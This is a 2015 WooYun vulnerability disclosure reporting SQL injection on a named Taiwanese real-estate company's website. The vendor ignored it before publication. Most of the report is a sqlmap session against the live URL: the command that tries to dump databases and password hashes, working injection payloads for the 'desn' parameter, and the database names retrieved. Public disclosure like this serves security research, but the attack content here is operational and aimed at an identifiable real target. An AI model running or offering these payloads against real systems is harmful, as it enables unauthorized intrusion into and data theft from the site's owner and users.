当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099565

漏洞标题:台灣某房地產商SQL Injection

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 路人甲

提交时间:2015-03-05 14:54

修复时间:2015-03-10 14:56

公开时间:2015-03-10 14:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

台灣某房地產商SQL Injection

详细说明:

QQ截图20150304225514.png


QQ截图20150304225524.png

漏洞证明:

[root@Hacker~]# Sqlmap sqlmap.py -u "http://www.3hlife.com.tw/manage_show.php?desn=15" --dbs --passwords --current-user --current-db --is-dba
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state
[*] starting at 22:50:59
[22:51:00] [INFO] testing connection to the target URL
[22:51:01] [INFO] testing if the target URL is stable. This can take a couple of seconds
[22:51:03] [INFO] target URL is stable
[22:51:03] [INFO] testing if GET parameter 'desn' is dynamic
[22:51:03] [INFO] confirming that GET parameter 'desn' is dynamic
[22:51:04] [INFO] GET parameter 'desn' is dynamic
[22:51:07] [INFO] heuristic (basic) test shows that GET parameter 'desn' might be injectable (possible DBMS: 'MySQL')
[22:51:07] [INFO] testing for SQL injection on GET parameter 'desn'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n]
[22:51:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:51:10] [WARNING] reflective value(s) found and filtering out
[22:51:12] [INFO] GET parameter 'desn' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[22:51:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:51:12] [INFO] GET parameter 'desn' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[22:51:12] [INFO] testing 'MySQL inline queries'
[22:51:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:51:14] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[22:51:20] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:51:20] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:51:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:52:10] [INFO] GET parameter 'desn' is 'MySQL > 5.0.11 AND time-based blind' injectable
[22:52:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:52:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:52:12] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for
[22:52:14] [INFO] target URL appears to have 9 columns in query
[22:52:37] [INFO] GET parameter 'desn' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[22:52:39] [WARNING] automatically patching output having last char trimmed
GET parameter 'desn' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 28 HTTP(s) requests:
---
Place: GET
Parameter: desn
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: desn=15 AND 4977=4977
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: desn=15 AND (SELECT 3559 FROM(SELECT COUNT(*),CONCAT(0x71676e6471,(SELECT (CASE WHEN (3559=3559) THEN 1 ELSE 0 END)),0x716b756a71,FLOOR(RAND(0)*2))x FROM INFOR
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: desn=15 UNION ALL SELECT NULL,NULL,CONCAT(0x71676e6471,0x636646596f6c48594b75,0x716b756a71),NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: desn=15 AND SLEEP(5)
---
[22:53:02] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:53:02] [INFO] fetching current user
current user: 'hlife3@%'
[22:53:03] [INFO] fetching current database
current database: 'hlife3'
[22:53:04] [INFO] testing if current user is DBA
[22:53:04] [INFO] fetching current user
[22:53:05] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[22:53:05] [INFO] fetching database users password hashes
[22:53:08] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION tech
[22:53:08] [WARNING] the SQL query provided does not return any output
[22:53:14] [WARNING] the SQL query provided does not return any output
[22:53:14] [INFO] fetching database users
[22:53:15] [INFO] fetching number of password hashes for user 'hlife3'
[22:53:15] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:53:15] [INFO] retrieved:
[22:53:19] [INFO] retrieved:
[22:53:19] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[22:53:25] [WARNING] unable to retrieve the number of password hashes for user 'hlife3'
[22:53:25] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system dat
[22:53:25] [INFO] fetching database names
available databases [2]:
[*] hlife3
[*] information_schema
[22:53:26] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in
[22:53:26] [INFO] fetched data logged to text files under 'C:\Users\ADMINI~1\Desktop\???~1\???~1\SQLMAP~1.4\Bin\output\www.3hlife.com.tw'

修复方案:

null

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-10 14:56

厂商回复:

最新状态:

暂无